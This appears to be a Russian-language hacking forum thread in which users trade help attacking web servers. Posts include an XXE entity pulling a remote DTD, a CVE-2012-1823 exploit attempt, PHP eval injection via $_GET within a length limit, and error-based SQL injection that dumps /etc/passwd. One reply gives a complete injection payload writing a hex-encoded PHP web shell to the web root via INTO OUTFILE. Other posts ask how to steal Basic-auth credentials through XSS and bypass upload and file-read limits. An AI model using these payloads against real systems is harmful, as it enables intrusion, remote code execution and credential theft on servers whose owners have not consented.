нет, враппера такого нет. стоит попробовать oob через ftp, http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
Столкнулся с проблемой, парсер довольно древний, не поддерживает EXTERNAL ENTITY. Поднял у себя такое же окружение, даю ему такой xml: HTML: <?xml version="1.0" standalone="no"?> <!DOCTYPE student [ <!ENTITY % student SYSTEM "http://www.myhost.com/student.dtd"> %student; ]> Получаю ответ: Code: ex.xml:4: parser error : PEReference: %student; not found %student; ^ ex.xml:6: parser error : Start tag expected, '<' not found ^ XML::Simple called at ./run.pl line 6. В новой версии парсера такой проблемы нет. Стоит отметить, такой XML прожевывает: Code: <?xml version="1.0"?> <!DOCTYPE author [ <!ELEMENT author (#PCDATA)> <!ENTITY email "[email protected]"> <!--the following use of a general entity is legal if it is used in the XML document--> <!ENTITY js "Jo Smith &email;"> ]> <author>&js;</author> В таком случае можно что-нибудь предпринять?
Это пример из документации. Я как только не пробовал, external entity отказывается обрабатывать. На парсере версии чуть повыше все пашет. Работает только если создать сущность и сослаться на нее в каком-нибудь теге
Используется следующее: Code: 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) PHP/5.3.10-1ubuntu3.25 Использую CVE-2012-1823 > Exploit completed, but no session started. Порты открыты, в чем проблема?
Есть возможность записать в переменные произвольный текст. Code: <?PHP $mail = ""; $data = "05.05.2015"; ?> Но вот проблема, max кол-во символов 15 на каждую переменную. p.s @`$c` - пробовал
15 символов для выполнения кода? https://forum.antichat.ru/threads/307086/ пробуй это https://forum.antichat.ru/threads/307086/#post-2929944
) $mail = "eval($_GET[1]);"; - Так не будет работать $mail = ""; $a1=eval($_GET[l]); echo "$a1"; - Так будет ---------- Не актуально, нашел решения
Добрый день. Есть вот такой скрипт. PHP: $uploaddir = 'dir/';$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) { echo "good";} Есть ли возожность как-то обойти basename т.к. директории dir нету, то надо загрузить файл выше директорией)
Apache 2.2.22 phpMyAdmin 3.4.11.1 (есть доступ, без прав на создание бд и загрузку) SquirrelMail 1.4.23 на ip видит около 5ти сайтов, имеем wordpress 4.4.2 (wpscan - http://pastebin.com/WuysyCNL) PHP/5.4.45-0+deb7u1 В http://site/phpmyadmin/setup/ могу создать сервер без проблем - http://imgur.com/a/SxnIN Что можно осуществить с этим? Некоторые вещи пробовал, но хочу выслушать ваши предложения
Добрый подскажите как применить into outfile При таком запросе: Code: http://localhost/'||(select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select load_file(0x2f6574632f706173737764) from information_schema.tables limit 1),1,64),floor(rand(0)*2)))||' Результат: Duplicate entry 'root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin' for key 1 Как в таком запросе внедрить? select '<?php system($_GET["cmd"]); ?>' into outfile '/var/www/html/UserFiles/shell.php'
http://localhost/'||(select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select код шелла в hex from mysql.user into outfile '/var/www/html/UserFiles/shell.php') from information_schema.tables limit 1),1,64),floor(rand(0)*2)))||' в твоем примере: http://localhost/'||(select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select 0x3C3F7068702073797374656D28245F4745545B22636D64225D293B203F3E from mysql.user into outfile '/var/www/html/UserFiles/shell.php') from information_schema.tables limit 1),1,64),floor(rand(0)*2)))||' если current_user file_priv=Y попробуй
На сайте имеется XSS. На сайте стоит бейзик авторизация ( .htpasswd ) Насколько реально получить Request > Authorization > value ?
Код: $html = @file_get_contents($_GET['param'] . '?q=' . $q); echo $html; Могу передать любой param и $q, хочу прочитать конфиг движка. Но проблема, как видим, в том что добавляется '?q=' . $q к пути, следовательно путь становится не корректным. Что можно сделать?
Привет, есть blind sql inj, могу читать файлы, но факт в том, что не все, то-есть /etc/passwd, /etc/mysql/my.cnf/, /etc/hosts читаются без проблем, а вот файл index.php не хочет, и конфиги апача тоже не видит, хотя путь 100% верный, так-как есть phpinfo() файл и через него все видно.
